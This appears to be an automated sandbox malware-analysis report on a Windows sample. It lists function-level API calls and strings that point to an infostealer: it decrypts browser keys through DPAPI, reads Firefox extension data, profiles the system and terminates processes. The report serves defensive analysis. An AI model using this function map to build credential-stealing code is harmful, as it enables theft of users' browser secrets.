lstrcatA.KERNEL32(?), ref: 00627C38
lstrcatA.KERNEL32(?,?), ref: 00627C4C
lstrcatA.KERNEL32(?), ref: 00627C5F

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006239EE: GetFileAttributesA.KERNEL32(?,?,?,0061EA72,?,?,?), ref: 006239F5

Part of subcall function 0062785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0062787F
Part of subcall function 0062785A: HeapAlloc.KERNEL32(00000000), ref: 00627886
Part of subcall function 0062785A: wsprintfA.USER32 ref: 0062789F
Part of subcall function 0062785A: FindFirstFileA.KERNEL32(?,?), ref: 006278B6
Part of subcall function 0062785A: StrCmpCA.SHLWAPI(?,00647AD8), ref: 006278D7
Part of subcall function 0062785A: StrCmpCA.SHLWAPI(?,00647ADC), ref: 006278F1
Part of subcall function 0062785A: wsprintfA.USER32 ref: 00627918
Part of subcall function 0062785A: CopyFileA.KERNEL32(?,?,00000001), ref: 006279D5
Part of subcall function 0062785A: DeleteFileA.KERNEL32(?), ref: 006279F8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1546541418-0
Opcode ID: d7a6fe2b84a5d041c6a3151496691bcceb6d2b255282bd62a6cf5152f366e9e9
Instruction ID: 521872810bd5b2607a547a3ba2834368c756d25a2fec263d5915c630b16a53d1
Opcode Fuzzy Hash: d7a6fe2b84a5d041c6a3151496691bcceb6d2b255282bd62a6cf5152f366e9e9
Instruction Fuzzy Hash: 8351DCB1A0012C9BCB54DB64DC95ADDB7B9BB4C311F4448EAF709E3250EA34AB89CF54

Function 006232E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062332A

Part of subcall function 0062421B: malloc.MSVCRT ref: 00624220
Part of subcall function 0062421B: strncpy.MSVCRT ref: 00624231

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00623352
lstrcatA.KERNEL32(?,00647E68,?,?,?,?,?), ref: 0062336F
GetCurrentHwProfileA.ADVAPI32(?), ref: 006232FB

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Strings

#'b, xrefs: 006233A4
Unknown, xrefs: 00623398

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: #'b$Unknown
API String ID: 2781187439-690406456
Opcode ID: 75c5fa62c3e87f7fc4326e43f0a7f5b86b3b6f98280ceeeb62e2cc26033e144a
Instruction ID: 925e782cebb90bd644cb302ef7b8b6e96808bd2c55af1381137597b62748599e
Opcode Fuzzy Hash: 75c5fa62c3e87f7fc4326e43f0a7f5b86b3b6f98280ceeeb62e2cc26033e144a
Instruction Fuzzy Hash: E0116071A40628ABDB50EB65EC56FCD73BEAB04700F0004E5B649E7151DE74AFD48F54

Function 006244FD Relevance: 10.5, APIs: 7, Instructions: 49processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 0062451F
Process32First.KERNEL32(00000000,00000128), ref: 00624533
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00624559
TerminateProcess.KERNEL32(00000000,00000000), ref: 00624568
CloseHandle.KERNEL32(00000000), ref: 0062456F
Process32Next.KERNEL32(?,00000128), ref: 00624582
CloseHandle.KERNEL32(?), ref: 00624592

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: e4455f069780f80fbfdb410cc634856db194275f1ab5ae6d926a8bc84ff1cd65
Instruction ID: 29b97607e330b190405a28f49c4e24c8e6200d1e560cb60447f5f690dcc866ed
Opcode Fuzzy Hash: e4455f069780f80fbfdb410cc634856db194275f1ab5ae6d926a8bc84ff1cd65
Instruction Fuzzy Hash: 07116171902A29ABDF219F60EC09BEE7BB5BF09702F0000A9E545A6190DF746F40CF51

Function 0062278C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227A0
HeapAlloc.KERNEL32(00000000,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227A7
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,006478C8,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227D5
RegQueryValueExA.KERNEL32(006478C8,00000000,00000000,00000000,000000FF,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227F1
RegCloseKey.ADVAPI32(006478C8,?,?,?,00625BD2,Windows: ,006478E0), ref: 006227FA

Strings

Windows 11, xrefs: 006227B8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: e198dd2fa728d45784844a0340ab23b7e059dd6b76410a79fc6e9a645e8abd71
Instruction ID: ce7316e1e929b1b5d1107e15976bbbf0c500da952dec391a2e36f07f33dc9d01
Opcode Fuzzy Hash: e198dd2fa728d45784844a0340ab23b7e059dd6b76410a79fc6e9a645e8abd71
Instruction Fuzzy Hash: 0BF04F75640705BFEB109BA0EC0EFAA7A7AFB45742F100064FA01D51A0DBB49914DB55

Function 006273AA Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006273DF
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 006273FF
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 00627425
RegCloseKey.ADVAPI32(?), ref: 00627431
lstrcatA.KERNEL32(?,?), ref: 00627460
lstrcatA.KERNEL32(?), ref: 00627473

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID:
API String ID: 3891774339-0
Opcode ID: 66f055d7ba380cef1579b6a3302a9878ebc3adec8ceca4d710720af312947805
Instruction ID: d4bdc098ac30b05b3a009b344aae257694b8e23efa451b27820b6615a6aaef04
Opcode Fuzzy Hash: 66f055d7ba380cef1579b6a3302a9878ebc3adec8ceca4d710720af312947805
Instruction Fuzzy Hash: F0419F3188012C9FCF55EB64EC4AEE9777AFF08301F0404A9A208971A1DA785ED58F94

Function 006193A4 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 105stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00623A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 006193EE

Part of subcall function 006191FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,0061665F,00000000,?), ref: 00619239

Part of subcall function 006192A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00619456), ref: 006192C9
Part of subcall function 006192A6: LocalAlloc.KERNEL32(00000040,00619456,?,?,00619456,?,0061DC56,?,?,?,?,?,?), ref: 006192DD
Part of subcall function 006192A6: LocalFree.KERNEL32(?,?,?,00619456,?,0061DC56,?,?,?,?,?,?), ref: 00619302

lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0061947F

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Strings

_key.txt, xrefs: 006194A2
"encrypted_key":", xrefs: 006193E8
DPAPI, xrefs: 00619432
, xrefs: 0061945C

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
String ID: $"encrypted_key":"$DPAPI$_key.txt
API String ID: 2040183763-3468172165
Opcode ID: 65b9a43a5c10e1a7a42ee01db487edf13e800dd6c9a834f478ceca3e69df28c5
Instruction ID: a32a701346077510004ee7f4329d9566a914cde773ddfb12e984ee6f70f29374
Opcode Fuzzy Hash: 65b9a43a5c10e1a7a42ee01db487edf13e800dd6c9a834f478ceca3e69df28c5
Instruction Fuzzy Hash: 6931823690010AAFCF10EBA5ED629DD77B6AF01360F144168F904A7291DB309F8ACAA4

Function 00619148 Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
LocalFree.KERNEL32(0061FCF9,?,?,?,?,0061F752,?,?,?), ref: 006191C7
CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 394aff99bd2ed4b87386f42dc9c74d6e9cb4943a6dcb8139fac6b7285255d345
Instruction ID: c77f19ce308a6b02204937eeccb5d21565f4bf65d38560878d2e56a7bfa4bc83
Opcode Fuzzy Hash: 394aff99bd2ed4b87386f42dc9c74d6e9cb4943a6dcb8139fac6b7285255d345
Instruction Fuzzy Hash: 51114C74900205FBDB219FA5CC5DEEEBBB6FB45741F240958F941A6290DB349AC1DB20

Function 006110E0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 0061109A
_memset.LIBCMT ref: 006110C0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 006110D6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00629CAB), ref: 006110F0
VirtualAllocExNuma.KERNEL32(00000000), ref: 006110F7
ExitProcess.KERNEL32 ref: 00611102

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 32ffb1e3f15a1909fff52401a8bb2e7696a674195d46803abb3c98c5df84b544
Instruction ID: 13b160ff851a39b9f0bb2c6e0d4f69bca629d83704f1d2a827274a3009fdb5d9
Opcode Fuzzy Hash: 32ffb1e3f15a1909fff52401a8bb2e7696a674195d46803abb3c98c5df84b544
Instruction Fuzzy Hash: A0F0C27AB81350B7E32022752C5EFEB2A6E9B43F62F241015F709EF2D0DE6199C49674

Function 00622D75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00647950,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904,Install Date: ), ref: 00622D8D
HeapAlloc.KERNEL32(00000000), ref: 00622D94
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00622DB0
wsprintfA.USER32 ref: 00622DD6

Strings

%d MB, xrefs: 00622DD0

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 6e14859f7e0023438f61aa2a0284ba23cf3776a5442d64b4782a6d071eb76fc5
Instruction ID: 92c15022fddce91e66e5ea30a7f8841efd5ecf3bc8bad1399ad77157ee145cbf
Opcode Fuzzy Hash: 6e14859f7e0023438f61aa2a0284ba23cf3776a5442d64b4782a6d071eb76fc5
Instruction Fuzzy Hash: 010186B1A00618ABEB04DFB4EC45AFEB7B9FF05741F440429F502E3280DE7499018B65

Function 0061E401 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00623A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

StrStrA.SHLWAPI(00000000,?,00648700,0064796B), ref: 0061E492
lstrlenA.KERNEL32(?), ref: 0061E4A5

Strings

moz-extension+++, xrefs: 0061E4D0
^userContextId=4294967295, xrefs: 0061E4CA
{a, xrefs: 0061E41A, 0061E42D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

